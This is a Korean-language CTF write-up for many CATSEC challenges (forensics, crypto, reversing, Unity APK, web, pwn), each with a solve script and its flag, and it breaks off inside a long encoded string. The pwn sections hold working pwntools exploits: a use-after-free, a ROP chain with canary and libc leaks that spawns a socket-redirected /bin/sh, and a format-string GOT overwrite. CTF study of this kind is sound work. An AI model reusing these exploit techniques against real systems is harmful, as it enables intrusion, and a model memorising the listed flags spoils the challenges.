비밀번호를 찾아달라는 포렌식 문제이다.
.dmp 파일에서 비밀번호를 찾아야 하지만 binwalk를 돌려서 PNG파일들의 위치를 찾아내서 다 추출해서 보니까 거기에 플래그가 있었다.
유일하게 PNG크기가 1152 x 648 이어서 수상해서 추출했더니 플래그였다.
CATSEC{Oh_GoodGoodGoodVeryGood}
1 ~ 0xf의 난수를 발생시켜서 몫과 나머지를 난수와 함께 4글자 단위로 저장한다.
네글자씩 읽어서 난수 * 몫 + 나머지 해서 저장하면 된다.
enc = open("flag.enc", "rb").read().encode('hex')
dec = ''
for i in range(0, len(enc), 4):
dec += chr(int(enc[i], 16) * int(enc[i + 1] + enc[i + 2], 16) + int(enc[i + 3], 16))
open("flag.png", "wb").write(dec)위의 복호화 소스를 돌리면 플래그 사진이 복호화된다.
CATSEC{Y0u_Ar3_G3n1us}
바이너리는 엄청 단순하고 money가 99999999999 이상이 되면 플래그를 출력해준다.
Alchemy 메뉴에서 mineral이 하나만 있으면 연금술을 위해 free는 하는데 cnt가 1이기 때문에 그대로 fail 하면서 리턴해버린다.
이 때 바로 Selling을 하면 uaf가 발생한다.
그리고 Init을 보면 10초 후에 strdup으로 "Bitcoin" 문자열을 mineral_type 어딘가에 넣는데 strdup은 힙 영역을 사용하므로 Mining - Alchemy을 해서 bag에 free된 mineral이 들어가있게 하고 10초를 기다려서 free된 영역에 "Bitcoin" 문자열이 들어갔을 때 Selling을 하면 돈이 99999999999를 넘어서 플래그를 출력해준다.
from pwn import *
r = remote("1.224.175.35", 30001)
r.sendlineafter(">> ", "1")
sleep(3)
r.sendlineafter(">> ", "3")
sleep(8)
r.sendlineafter(">> ", "2")
r.interactive()CATSEC{SCV_1S_BESF_0F_UNIT_1N_STARCRAFT}
이 바이너리는 소켓으로 통신하는데 소켓은 바이너리가 재실행 되기 전에는 카나리와 립씨 주소가 항상 같으므로 익스할 때 편했다.
6번 메뉴에서 버퍼 오버플로우 취약점이 있다.
다른 메뉴들에서 취약점을 트리거하기 위한 조건들만 조금씩 맞춰주면 된다.
6번에서 카나리 릭하고 다시 연결해서 릭한 카나리로 ROP해서 립씨 주소 릭하고 다시 연결해서 bss에 "/bin/sh 0<&4 1>&4 2>&4;" 소켓으로 리다이렉팅 시켜주는 /bin/sh 문자열 read하고 system함수를 호출하면 된다.
from pwn import *
def set_trigger():
r.sendlineafter("exterminator? ", "y")
for i in range(2):
r.sendlineafter("choice) :", "6")
r.sendlineafter("choice) :", "5")
r.sendlineafter("choice) :", "4")
r.sendlineafter("choice) :", "3")
for i in range(3):
r.sendlineafter("choice) :", "2")
for i in range(3):
r.sendlineafter("choice) :", "1")
r.sendlineafter("choice) :", "6")
r = remote("1.224.175.52", 30003)
set_trigger()
r.sendlineafter("Chance : ", 'A' * 0xc7)
r.recvuntil("A\n")
canary = u64(r.recv(8))
log.info("canary : " + hex(canary))
r.close()
r = remote("1.224.175.52", 30003)
set_trigger()
payload = "A" * 0xc8
payload += p64(canary)
payload += "B" * 8
payload += p64(0x00000000004015b3) # pop rdi
payload += p64(4)
payload += p64(0x000000000040153d) # pop rdx
payload += p64(8)
payload += p64(0x00000000004015b1) # pop rsi r15
payload += p64(0x0000000000602F90) # __libc_start_main got
payload += "AAAAAAAA"
payload += p64(0x00000000004009F0) # write
r.sendlineafter("Chance : ", payload)
r.recvuntil(p64(canary))
libc_base = u64(r.recv(8)) - 0x20740
system = libc_base + 0x45390
log.info("libc_base : " + hex(libc_base))
r.close()
r = remote("1.224.175.52", 30003)
set_trigger()
payload = "A" * 0xc8
payload += p64(canary)
payload += "AAAAAAAA"
payload += p64(0x00000000004015b3) # pop rdi
payload += p64(4)
payload += p64(0x000000000040153d) # pop rdx
payload += p64(24)
payload += p64(0x00000000004015b1) # pop rsi r15
payload += p64(0x0000000000603010) # .bss
payload += "AAAAAAAA"
payload += p64(0x0000000000400A28) # read
payload += p64(0x00000000004015b3) # pop rdi
payload += p64(0x0000000000603010) # .bss
payload += p64(system) # system
payload += "AAAAAAAA"
r.sendlineafter("Chance : ", payload)
r.sendlineafter(p64(canary), "/bin/sh 0<&4 1>&4 2>&4;")
r.interactive()CATSEC{1m_ab0uT_T0_0v3r10rd_mY_aggr35510n_1nh1b1T0r5}
그냥 간단하게 포맷스트링이 일어나는 바이너리이다.
근데 fini_array에 write권한도 없고 스택 주소도 모르고 printf 후 바로 종료를 해서 어딜 덮어야 하나 고민하다가 canary까지 오버플로우가 나는 것을 보고 __stack_chk_fail의 got를 _start의 주소로 덮어서 카나리를 조작해서 계속 main을 호출했다.
포맷스트링으로 립씨 주소를 릭하고 got를 덮은 후에 다시 호출되면 __stack_chk_fail를 다시 system으로 덮고 system의 인자에 유저인풋이 있도록 스택을 잘 끌어올려 중간에 ;/bin/sh;를 넣어서 쉘을 실행할 수 있다.
from pwn import *
r = remote("1.224.175.32", 30006)
payload = p32(0x0804A014) # __stack_chk_fail
payload += p32(0x0804A016) # __stack_chk_fail + 2
payload += p32(0x0804A01C) # __libc_start_main
payload += '%33844c%6$hn'
payload += '%33732c%7$hn'
payload += '5unKn0wn'
payload += '%8$s'
payload += 'A' * (0x67 - len(payload))
r.sendlineafter("Start..\n", payload)
r.recvuntil("5unKn0wn")
libc_base = u32(r.recv(4)) - 0x00018540
system = libc_base + 0x3ADA0
log.info("libc_base : " + hex(libc_base))
r.sendlineafter("Start..\n", 'A' * 0x67)
payload = p32(0x0804A014) # __stack_chk_fail
payload += p32(0x0804A016) # __stack_chk_fail + 2
payload += '%' + str((system & 0xffff) - 8) + 'c%6$hn'
payload += '%' + str(((system >> 16) - (system & 0xffff)) & 0xffff) + 'c%7$hn'
payload += 'AAAAAAAAAAA;/bin/sh;'
payload += 'A' * (0x67 - len(payload))
r.sendlineafter("Start..\n", payload)
r.interactive()CATSEC{Start_n0w!!!!!~}
C#으로 만들어졌길래 디컴파일해서 보니까 18글자를 아스키 범위에서 입력받아 xor이랑 이런저런 연산을 해서 크기랑 값을 막 복잡하게 비교한다.
손으로 하기에는 무리가 있기에 파이썬 z3을 이용해서 올바른 input을 구했다.
from z3 import *
inp = [BitVec('inp_%d' % i, 8) for i in range(18)]
s = Solver()
tmp = 0
for i in range(16):
s.add(inp[i] >= 32, inp[i] < 0x7f)
if i == 6:
num1 = inp[6]
num2 = inp[16]
num3 = inp[17]
temp1 = num2 >> 2 ^ num3
temp2 = num3 >> 2 ^ num1
temp3 = num2 >> 2 ^ num1
s.add(num1 >= temp1, num2 >= temp2, num3 >= temp3)
else:
num1 = inp[i]
num2 = (inp[i + 1] >> 2) ^ inp[i + 2]
s.add(num1 >= num2)
if (i % 2 == 0) and i < 14:
num1 = inp[i]
num2 = inp[i + 2]
num3 = inp[i + 4]
num4 = inp[17 - i]
if tmp == 0:
s.add(num1 == (num2 ^ num3) + num4, 94 == (num1 ^ num2 ^ num3))
elif tmp == 2:
s.add(num1 == (num2 ^ num3) - num4 + 5, 32 == (num1 ^ num2 ^ num3))
elif tmp == 4:
s.add(num1 == ((num2 ^ num3) - num4) * 18, 11 == (num1 ^ num2 ^ num3))
elif tmp == 6:
s.add(num1 == (num2 ^ num3) + num4 - 2, 49 == (num1 ^ num2 ^ num3))
elif tmp == 8:
s.add(num1 == (num2 ^ num3 ^ num4) - 4, 89 == (num1 ^ num2 ^ num3))
elif tmp == 10:
s.add(num1 == (num2 ^ num3 ^ num4) + 19, 114 == (num1 ^ num2 ^ num3))
elif tmp == 12:
s.add(num1 == -((num2 ^ num3) & 2) + num4, 69 == (num1 ^ num2 ^ num3))
elif (i % 2 != 0) and i < 14:
num1 = inp[i]
num2 = inp[i + 2]
num3 = inp[i + 4]
num4 = inp[17 - i]
if tmp == 1:
s.add(102 == (num1 ^ num2 ^ num3))
elif tmp == 3:
s.add(74 == (num1 ^ num2 ^ num3))
elif tmp == 5:
s.add(107 == (num1 ^ num2 ^ num3))
elif tmp == 7:
s.add(57 == (num1 ^ num2 ^ num3))
elif tmp == 9:
s.add(89 == (num1 ^ num2 ^ num3))
elif tmp == 11:
s.add(41 == (num1 ^ num2 ^ num3))
elif tmp == 13:
s.add(40 == (num1 ^ num2 ^ num3))
tmp += 1
s.check()
m = s.model()
print ''.join(chr(m[inp[i]].as_long()) for i in range(18))이 결과 출력된 올바를 input은 Is_tHa7_tUr3_?_%E2 이고 이를 한글자씩 입력하면 플래그가 나온다.
CATSEC{d0_7ou_kN0VV_Me1Omanc3_??_goO0od_!!}
루틴을 보니까 테이블이 변경된 base64 같다.
변경된 테이블과 루틴할 때 조금 xor하는거만 신경써서 base64 디코딩해주면 된다.
def base64_decode(s):
b64s = "ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210 /"
b64p = "="
ret = ""
s2 = s.replace(b64p, "")
left = 0
for i in range(0, len(s2)):
if left == 0:
left = 6
else:
value1 = b64s.index(s2[i - 1]) & (2 ** left - 1)
value2 = b64s.index(s2[i]) >> (left - 2)
value = (value1 << (8 - left)) | value2
ret += chr(value)
left -= 2
return ret
fake = "J9UFF9EWv9AABCEOHFEKAqUNNnVcIaM0"
secret_md5 = "5D8F988547D3B4087AE478403145ADC9"
resu = [0x4F, 0x38, 0x39, 0x79, 0x1B, 0x58, 0x3E, 0x28, 0x2D, 0x3A, 0x41, 0x08, 0x4A, 0x32, 0x1B, 0x0E, 0x14, 0x46, 0x46, 0x06, 0x05, 0x26, 0x58, 0x08, 0x2A, 0x1A, 0x5B, 0x10, 0x4E, 0x70, 0x37, 0x43]
encoded_base64 = ''.join(chr(ord(fake[i]) ^ ord(secret_md5[i]) ^ resu[i]) for i in range(len(fake)))[::-1]
print base64_decode(encoded_base64)CATSEC{IamFinePineApple}
테트리스 게임 문제이다.
처음에는 패치해서 풀라고 했는데 뭔가 자꾸 오류가 나고 잘 안돼서 걍 플래그 구하는 루틴을 직접 코딩해서 풀었다.
flag_table = [74, 93, 109, 51, 212, 143, 362, 311, 393, 619, 86, 101, 86, 21, 206, 173, 355, 261, 486, 638, 108, 111, 77, 63, 208, 190, 295, 259, 465, 626, 96, 41, 68]
xor_table = []
score = 0
for i in range(1, 11):
score += (10 * i - 1)
xor_table.append(score & 0xff)
print ''.join(chr(((flag_table[i] & 0xff) ^ (xor_table[i % len(xor_table)] & 0xff))) for i in range(len(flag_table)))CATSEC{W0w_you_are_best_Ar6chni5}
flag.docx를 읽어서 세제곱근을 구해가지고 3차원 배열에 넣어서 연산을 한다.
urandom 값으로 처음에 add하고 난 후에 32번 각 열들을 회전하는 듯한 연산을 한다.
그냥 파이썬으로 포팅해서 역연산 코드를 짜서 풀었다.
import math
def encrypt(plain, urandom1, urandom2, cnt):
inp_arr = []
enc = ''
idx = 0
for i in range(cnt):
tmp1 = []
for j in range(cnt):
tmp2 = []
for k in range(cnt):
tmp2.append(ord(plain[idx]))
idx += 1
tmp1.append(tmp2)
inp_arr.append(tmp1)
idx = 0
for i in range(cnt):
for j in range(cnt):
for k in range(cnt):
inp_arr[i][j][k] = (inp_arr[i][j][k] + ord(urandom1[idx % 8])) & 0xff
idx += 1
for i in range(32):
rotate_arr = []
urandom_byte = ord(urandom2[i])
idx = (urandom_byte >> 2) % cnt
if urandom_byte & 1:
for j in range(cnt):
tmp1 = []
for k in range(cnt):
tmp1.append(inp_arr[j][idx][k])
rotate_arr.append(tmp1)
if urandom_byte & 2:
for j in range(cnt):
for k in range(cnt):
inp_arr[k][idx][cnt - j - 1] = rotate_arr[j][k]
else:
for j in range(cnt):
for k in range(cnt):
inp_arr[cnt - k - 1][idx][j] = rotate_arr[j][k]
else:
for j in range(cnt):
tmp1 = []
for k in range(cnt):
tmp1.append(inp_arr[j][k][idx])
rotate_arr.append(tmp1)
if urandom_byte & 2:
for j in range(cnt):
for k in range(cnt):
inp_arr[cnt - k - 1][j][idx] = rotate_arr[j][k]
else:
for j in range(cnt):
for k in range(cnt):
inp_arr[k][cnt - j - 1][idx] = rotate_arr[j][k]
for i in range(cnt):
for j in range(cnt):
for k in range(cnt):
enc += chr(inp_arr[i][j][k])
return enc
def decrypt(encrypted, urandom1, urandom2, cnt):
urandom2 = urandom2[::-1]
inp_arr = []
dec = ''
idx = 0
for i in range(cnt):
tmp1 = []
for j in range(cnt):
tmp2 = []
for k in range(cnt):
tmp2.append(ord(encrypted[idx]))
idx += 1
tmp1.append(tmp2)
inp_arr.append(tmp1)
for i in range(32):
rotate_arr = []
urandom_byte = ord(urandom2[i])
idx = (urandom_byte >> 2) % cnt
if urandom_byte & 1:
for j in range(cnt):
tmp1 = []
for k in range(cnt):
tmp1.append(inp_arr[j][idx][k])
rotate_arr.append(tmp1)
if urandom_byte & 2:
for j in range(cnt):
for k in range(cnt):
inp_arr[cnt - k - 1][idx][j] = rotate_arr[j][k]
else:
for j in range(cnt):
for k in range(cnt):
inp_arr[k][idx][cnt - j - 1] = rotate_arr[j][k]
else:
for j in range(cnt):
tmp1 = []
for k in range(cnt):
tmp1.append(inp_arr[j][k][idx])
rotate_arr.append(tmp1)
if urandom_byte & 2:
for j in range(cnt):
for k in range(cnt):
inp_arr[k][cnt - j - 1][idx] = rotate_arr[j][k]
else:
for j in range(cnt):
for k in range(cnt):
inp_arr[cnt - k - 1][j][idx] = rotate_arr[j][k]
idx = 0
for i in range(cnt):
for j in range(cnt):
for k in range(cnt):
inp_arr[i][j][k] = (inp_arr[i][j][k] - ord(urandom1[idx % 8])) & 0xff
idx += 1
for i in range(cnt):
for j in range(cnt):
for k in range(cnt):
dec += chr(inp_arr[i][j][k])
return dec
enc = open("flag.enc.docx", "rb").read()
urandom1 = enc[:8]
urandom2 = enc[8:40]
enc = enc[40:]
cnt = 0x18
dec = decrypt(enc, urandom1, urandom2, cnt)
open("flag.docx", "wb").write(dec)처음에는 파일이 손상되었다고 나오는데 복구 누르면 복구해준다.
CATSEC{I_L1KE_RUB1X_CUBE_AND_Y0U?}
apk인데 유니티로 만들어졌다.
유니티로 만들어진 apk는 dex에 실행코드가 아니라 assets/bin/Data/Managed/Assembly-CSharp.dll 에 진짜 동작 코드가 들어있다.
C#으로 만들어졌기 때문에 디컴파일 해서 보면 1등을 했을 때 플래그를 시간 값과 카운트 값을 이용해서 키를 만들고 AES PCKS7 으로 복호화한다.
시간 값은 0 ~ 180이고 카운트 값은 두자리 이므로 0 ~ 99 일 것이라 예상했다.
브포 가능한 경우의 수이므로 그냥 시간 값과 카운트 값을 브포해서 플래그를 구했다.
from Crypto.Cipher import AES
from pkcs7 import PKCS7Encoder
enc = "PC9al1Z5yLVCjov4DxxUoxCftGm5V92neSDAtvSKSlFrQPiyFh1d56skf/Z7avSl".decode('base64')
for time in range(180):
for cnt in range(99):
key = "2008" + str(time) + str(cnt).zfill(2)
key = key.zfill(32)
aes = AES.new(key, AES.MODE_ECB)
decoder = PKCS7Encoder()
dec = aes.decrypt(enc)
dec = decoder.decode(dec)
if dec.startswith("CATSEC{"):
print decCATSEC{Have_you_had_a_g00D_tIMe}
white.js를 보면 /index.php?page=encrypt 랑 /index.php?page=check 가 있는 것을 볼 수 있다.
/index.php?page=check의 소스를 보면 str이 \Y32|H09\T19\T19| ... E29|A30|}39 길게 어떤 값일 때 comment를 출력해준다.
코멘트에는 저 값을 복호화한게 플래그라고 적혀있다.
/index.php?page=encrypt에 값을 보내보면 아스키당 1대 1로 매칭이 되서 암호화 되므로 각 아스키 당 테이블을 구해서 복호화 했다.
그리고 다시 js소스에 있는 테이블로 base64 디코딩 하고 쓰레기 값 좀 없애주면 플래그가 나온다.
from requests import *
def base64_decode(s):
b64s = "MGTopUVHklmnqAB2345IJKLrstu+/=RSWXYZabcdeNOPQCDEFfghij67vwxy0189z"
b64p = "="
ret = ""
s2 = s.replace(b64p, "")
left = 0
for i in range(0, len(s2)):
if left == 0:
left = 6
else:
value1 = b64s.index(s2[i - 1]) & (2 ** left - 1)
value2 = b64s.index(s2[i]) >> (left - 2)
value = (value1 << (8 - left)) | value2
ret += chr(value)
left -= 2
return ret
table = "0123456789abcdefghijklmnopqrstvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/="
enc_list = ['|S04', '|E05', '|C06', '|{07', '|T08', '|H09', '|I10', '|S11', '|_12', '|E13', '|N14', '|C15', '|R16', '|Y17', '|P18', '|T19', '|_20', '|I21', '|S22', '|_23', '|V24', '|E25', '|R26', '|Y27', '|_28', '|E29', '|A30', '|S31', '|Y32', '|_33', '|O35', '|R36', '|R37', '|Y38', '|}39', '\\N14', '\\C15', '\\R16', '\\Y17', '\\P18', '\\T19', '\\_20', '\\I21', '\\S22', '\\_23', '\\V24', '\\E25', '\\R26', '\\Y27', '\\_28', '\\E29', '\\A30', '\\S31', '\\Y32', '\\_33', '\\S34', '\\O35', '\\R36', '\\R37', '\\Y38', '\\}39', '|C01', '|A02', '|T03']
enc = "\Y32|H09\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19|_33|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27\S34|V24\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30\_23\Y38\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19|C06|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27\S34|A30\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|S31|_20\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19|_33|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27\S34|A30\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|{07|H09\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19\S34|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27\S34|S04\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30\E25|H09\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19|H09|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|E29\_23\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30\V24\Y38\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19\Y32|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27\S34|A30\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|H09|H09\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19\Y32|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R